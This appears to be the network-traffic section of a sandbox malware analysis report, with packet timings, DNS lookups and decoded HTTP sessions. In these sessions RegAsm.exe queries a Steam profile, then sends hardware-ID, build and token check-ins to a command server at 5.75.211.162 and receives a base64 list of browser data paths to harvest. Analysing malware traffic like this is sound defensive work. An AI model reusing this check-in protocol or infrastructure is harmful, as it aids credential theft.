                                                                                                      Sep 26, 2024 19:05:53.145111084 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.146830082 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.146872044 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.146905899 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.146914959 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.146943092 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.146961927 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.158020973 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.158065081 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.158096075 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.158108950 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.158127069 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.158149004 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.158703089 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.158742905 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.158770084 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.158776045 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.158796072 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.158818960 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.159696102 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.159738064 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.159764051 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.159770966 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.159792900 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.159806967 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.195132017 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.195189953 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.195250034 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.195261002 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.195317030 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.210670948 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.210716009 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.210814953 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.210829020 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.210849047 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.210865021 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.232054949 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.232105017 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.232160091 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.232181072 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.232196093 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.232213020 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.234203100 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.234236002 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.234272957 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.234281063 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.234302044 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.234318018 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.235918999 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.235946894 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.235980034 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.235987902 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.704150915 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.704895973 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.704921961 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.704978943 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.704983950 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.705008030 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.705045938 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.705055952 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.705061913 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.705091000 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.705106020 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.705832958 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.705853939 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.705894947 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.705902100 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.705921888 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.705935001 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.705938101 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.705952883 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.705975056 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.705984116 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.706000090 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.706005096 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.706027031 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.706054926 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.746207952 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.746273994 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.746290922 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.746306896 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.746340036 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.746357918 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.751040936 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.751085997 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.751120090 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.751128912 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.751153946 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.751168966 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.801543951 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.801613092 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.801671028 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.801692009 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.801727057 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.801749945 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.802206993 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.802249908 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.802272081 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.802282095 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.802301884 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.802324057 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.802452087 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.802495003 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.802515984 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.802525997 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.802545071 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.802562952 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.802659988 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.802702904 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.802720070 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.802730083 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.802748919 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.802769899 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.803092003 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.803137064 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.803163052 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.803169966 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.803190947 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.803209066 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.803287029 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.803330898 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.803344011 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.803353071 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.803392887 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.803392887 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.835033894 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.835079908 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.835134029 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.835144997 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.835185051 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.835201979 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.839942932 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.839987040 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.840018988 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.840027094 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.840050936 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.840074062 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.890350103 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.890415907 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.890496016 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.890508890 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.890546083 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.890563011 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.890566111 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:53.890611887 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.890887022 CEST49731443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:53.890909910 CEST443497315.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:54.203454971 CEST49732443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:54.203560114 CEST443497325.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:54.203728914 CEST49732443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:54.203969002 CEST49732443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:54.204003096 CEST443497325.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:54.889853954 CEST443497325.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:54.892995119 CEST49732443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:54.893606901 CEST49732443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:54.893626928 CEST443497325.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:54.896260023 CEST49732443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:54.896269083 CEST443497325.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:54.896325111 CEST49732443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:54.896332026 CEST443497325.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:55.512687922 CEST49733443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:55.512739897 CEST443497335.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:55.512830973 CEST49733443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:55.513171911 CEST49733443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:55.513190985 CEST443497335.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:55.621301889 CEST443497325.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:55.621419907 CEST49732443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:55.621489048 CEST443497325.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:55.621526957 CEST443497325.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:55.621578932 CEST49732443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:55.621612072 CEST49732443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:55.622647047 CEST49732443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:55.622683048 CEST443497325.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:56.180875063 CEST443497335.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:56.180974007 CEST49733443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:56.181519985 CEST49733443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:56.181528091 CEST443497335.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:56.184253931 CEST49733443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:56.184261084 CEST443497335.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:56.903832912 CEST443497335.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:56.903862953 CEST443497335.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:56.903937101 CEST443497335.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:56.904026031 CEST49733443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:56.904026031 CEST49733443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:56.904026031 CEST49733443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:56.904359102 CEST49733443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:56.904378891 CEST443497335.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:56.907277107 CEST49734443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:56.907306910 CEST443497345.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:56.907407045 CEST49734443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:56.907697916 CEST49734443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:56.907711983 CEST443497345.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:57.843301058 CEST443497345.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:57.843408108 CEST49734443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:57.844021082 CEST49734443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:57.844034910 CEST443497345.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:57.846713066 CEST49734443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:57.846719980 CEST443497345.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:58.574630022 CEST443497345.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:58.574683905 CEST443497345.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:58.574800968 CEST49734443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:58.574830055 CEST443497345.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:58.574876070 CEST49734443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:58.574973106 CEST49734443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:58.575449944 CEST49734443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:58.575472116 CEST443497345.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:58.597148895 CEST49735443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:58.597258091 CEST443497355.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:58.597378016 CEST49735443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:58.597732067 CEST49735443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:58.597769022 CEST443497355.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:59.292138100 CEST443497355.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:59.292301893 CEST49735443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:59.292823076 CEST49735443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:59.292855024 CEST443497355.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:59.294949055 CEST49735443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:59.294962883 CEST443497355.75.211.162192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 19:05:25.633887053 CEST | 54769 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 19:05:25.641083956 CEST | 53 | 54769 | 1.1.1.1 | 192.168.2.5
Sep 26, 2024 19:06:04.108952999 CEST | 55859 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 19:06:04.354983091 CEST | 53 | 55859 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 19:05:25.633887053 CEST | 192.168.2.5 | 1.1.1.1 | 0xf01b | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Sep 26, 2024 19:06:04.108952999 CEST | 192.168.2.5 | 1.1.1.1 | 0xccfa | Standard query (0) | dbsmena.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 26, 2024 19:05:25.641083956 CEST | 1.1.1.1 | 192.168.2.5 | 0xf01b | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 19:06:04.354983091 CEST | 1.1.1.1 | 192.168.2.5 | 0xccfa | No error (0) | dbsmena.com | | 172.105.54.160 | A (IP address) | IN (0x0001) | false

• steamcommunity.com
• 5.75.211.162
• dbsmena.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49715 | 104.102.49.254 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:26 UTC | 119 | OUT | GET /profiles/76561199780418869 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:27 UTC | 1870 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Thu, 26 Sep 2024 17:05:26 GMT
Content-Length: 34725
Connection: close
Set-Cookie: sessionid=d9c2acdbbbc3eb5d00e7d967; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 17:05:27 UTC | 14514 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 17:05:27 UTC | 16384 | IN | Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 17:05:27 UTC | 3768 | IN | Data Ascii: vate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 17:05:27 UTC | 59 | IN | Data Ascii: </div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49716 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:29 UTC | 185 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:29 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-26 17:05:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49717 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:30 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 255
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:30 UTC | 255 | OUT | Data Ascii:
------AEGHIJEHJDHIDHIDAEHC
Content-Disposition: form-data; name="hwid"

708AC0D615E1650445529-a33c7340-61ca
------AEGHIJEHJDHIDHIDAEHC
Content-Disposition: form-data; name="build_id"

e90840a846d017e7b095f7543cdf2d15
------AEGHIJEHJDHIDHIDAEHC--
2024-09-26 17:05:31 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-26 17:05:31 UTC | 69 | IN | Data Ascii:
3a
1|1|1|1|8501f5d5616d1cfe27783966f7e54258|1|1|1|0|0|50000|1
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49718 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:31 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:31 UTC | 331 | OUT | Data Ascii:
------AAAAKJKJEBGHJKFHIDGC
Content-Disposition: form-data; name="token"

8501f5d5616d1cfe27783966f7e54258
------AAAAKJKJEBGHJKFHIDGC
Content-Disposition: form-data; name="build_id"

e90840a846d017e7b095f7543cdf2d15
------AAAAKJKJEBGHJKFHIDGC
Cont
2024-09-26 17:05:32 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-26 17:05:32 UTC | 1564 | IN | Data Ascii:
610
R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49719 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:33 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:33 UTC | 331 | OUT | Data Ascii:
------JJDHIDBFBFHIJKFHCGIE
Content-Disposition: form-data; name="token"

8501f5d5616d1cfe27783966f7e54258
------JJDHIDBFBFHIJKFHCGIE
Content-Disposition: form-data; name="build_id"

e90840a846d017e7b095f7543cdf2d15
------JJDHIDBFBFHIJKFHCGIE
Cont
2024-09-26 17:05:33 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-26 17:05:33 UTC | 5685 | IN | Data Ascii:
1628
